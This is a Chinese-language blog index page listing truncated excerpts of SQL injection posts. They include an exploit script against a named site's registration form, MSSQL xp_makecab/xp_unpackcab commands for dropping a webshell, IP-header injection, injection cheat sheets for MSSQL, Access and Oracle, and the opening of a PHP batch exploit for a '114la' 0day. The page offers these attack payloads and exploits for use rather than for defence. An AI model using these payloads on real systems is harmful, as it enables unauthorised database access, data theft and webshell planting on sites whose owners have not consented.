窝窝团SQL注入漏洞

注册页面 校验email和用户名的地方使用了Ajax POST 数据到服务器端检测,但是过滤仅在客户端进行。使用脚本或者浏览器工具可以轻松绕过。 以下为测试代码(python): import httplib, urllib import sys   if len(sys.argv) < 2: exit(0)   headers = { “Accept”: “*/*”, ...

- 阅读全文 -

3个MSSQL扩展,可用来获取WEBSHELL

EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp' 打包 EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp' 解包,可以用于得到webshell EXEC [master].[dbo].[xp_readerrorlog] 1,'d...

- 阅读全文 -

不常用的注入–利用IP地址进行注入

 以前曾经QQ空间发布过关于IP注入攻击的文章,这种注入其实没什么神秘,只是很多时候被忽略了。 IP伪造有几种途径,一种是通过是修改IP数据包,有兴趣的可以去看看IP数据包的结构,还有一种就是利用修改http头信息来实现IP伪造。涉及到“客户端”IP的通常使用3个环境变量:$_SERVER['HTTP_CLIENT_IP']和$_SERVER['X_FORWARDED_FOR']还有$_SERVE...

- 阅读全文 -

'插入式' 注入技巧

很不错的注入手法,今天发到这跟大家共享下。 不喜勿喷! 例: https://www.webshell.cc/gaokao/ReadNews.asp?NewsID=3255'&BigClassName=&BigClassID=21&SmallClassID=42&SpecialID=0 试着在Newsid=3255后面插入“'”,结果报错。 “Microsoft OL...

- 阅读全文 -

ASP ASPX PHP 构造注入页面的代码

把下面的代码分别保存为ASP。PHP。ASPX Mssql: <!–#include file=”conn.asp”–> <% hid=request.QueryString(“id”) sql=”select * from admin where id=”&hid set rs=conn.execute (sql) %> Access: <% db=”asp...

- 阅读全文 -

手工MSSQL注入常用SQL语句

and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 1=(select db_name()) //当前数据库名 and 1=(select @@ser...

- 阅读全文 -

注入命令

_________________________________________________________________________ 【测试注入】 and 1=1 and 1=2 _________________________________________________________________________ 【猜表一般表的名称无非是:admin adminuser ...

- 阅读全文 -

Access注入点高级运用总结

信赖Access注入点是人人看到最多的了,一样平常敷衍 办法就是: 猜表猜段猜内容---MD5---去靠山---看上传,备份,设置信息等等---上WEBSEHLL---提权.这是最常见和最普及 的ACCESS注入点应用行动 了.不外这里存在太多的不定因素,乐成 率非常低.任何一步失败,都也许让你不知怎样是好.. 但是ACCESS就只有这么点能耐了么?答案是否定 的.下面我们来看看,都有哪些地方 是...

- 阅读全文 -

Oracle 注入基础及相关特性总结

1.判断是否存在注入点的方法和其他数据库类似,and 1=1 和and 1=2 2.判断数据库为oracle 提交注释字符/*,返回正常即是MySQL,否则继续提交注释符号--,该符号是Oracle和MsSQL支持的注释符,返回正常就需要继续判断。可以继续提交多语句支持符号;如果支持多行查询,说明是MSSQL,因为Oracle不支持多行查询,可以继续提交查询语句: and exist(select...

- 阅读全文 -

114啦注入0day批量

<?php $sbcopyright=' ---------------------------------------- 114la feedback injection Vul Exploit By xZL Team: www.0kee.com 2011.04.02 Usage: php '.$argv[0].' host /path Example: php '.$argv[0].' ...

- 阅读全文 -